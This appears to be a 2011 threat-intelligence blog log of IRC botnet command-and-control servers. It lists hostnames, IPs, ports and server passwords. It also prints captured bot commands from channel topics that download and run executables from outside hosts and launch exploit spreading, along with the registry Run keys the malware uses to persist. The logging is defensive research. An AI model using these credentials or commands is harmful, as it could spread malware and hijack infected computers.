Found 1 addresses
addr: jjjjjj.ahrampress.net ip: 123.183.217.32
jjjjjj.ahrampress.net:6943
123.183.217.32 5943
123.183.217.32 6943
PASSWORD: eee
KCIK [N00_USA_XP_39922187]
rssr SP2-917 * 0 :COMPUTERNAME
Now talking in #j
Channel: #j
Topic is '.r.getfile -S|.r.getfile http://61.136.59.34/LWC/img/mheader.png C:\radr.exe 1|.asc -S|.http http://61.136.59.34/LWC/dc0.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0 -c|.asc exp_all 10 5 0 -a'
Set by minder48 on Mon Jan 17 17:58:06
# [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
Microsoft Driver Setup = "%Windir%\wjdrive32.exe"
This value makes wjdrive32.exe run every time Windows starts.
# [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
 Microsoft Driver Setup = "%Windir%\wjdrive32.exe"
C:\WINDOWS\wjdrive32.exe
Monday, January 17, 2011
jjjjjj.ahrampress.net
Posted by Role at 1:19 AM
Thursday, January 13, 2011
aaaa.forexinvest4.com (Updated)
Botnet IRC C&C
Found 1 addresses
addr: aaaa.forexinvest4.com ip: 216.104.45.90
aaaa.forexinvest4.com:6939
PASS laorosr
Channel: #dpi
Channel: #!
KCIK [N00_USA_XP_39922187]
rssr SP2-917 * 0 :COMPUTERNAME
Now talking in #!
Topic is '.asc -S|.http http://walthamfinancial.com/xmob.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0 -c|.asc exp_all 10 5 0 -a'
Set by teaser57 on Tue Jan 11 08:24:00
Process
HKLM\SOFTWARE\Microsoft\Windows\CurrentVer.\policies\Explorer\Run\
Microsoft Driver Setup
C:\WINDOWS\ggdrive32.exe
Posted by Role at 1:00 AM
Monday, January 10, 2011
aaaa.forexinvest4.com
Botnet IRC C&C
Found 2 addresses
addr: aaaa.forexinvest4.com ip: 109.196.130.66
addr: aaaa.forexinvest4.com ip: 109.196.130.50
aaaa.forexinvest4.com:6939
PASS laorosr
Channel: #dpi
Channel: #!
KCIK [N00_USA_XP_39922187]
rssr SP2-917 * 0 :COMPUTERNAME
Now talking in #!
Topic is '.asc -S|.http http://walthamfinancial.com/xmob.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0 -c|.asc exp_all 10 5 0 -a'
Set by teaser57 on Tue Jan 11 08:24:00
Process
HKLM\SOFTWARE\Microsoft\Windows\CurrentVer.\policies\Explorer\Run\
Microsoft Driver Setup
C:\WINDOWS\ggdrive32.exe
Posted by Role at 11:28 PM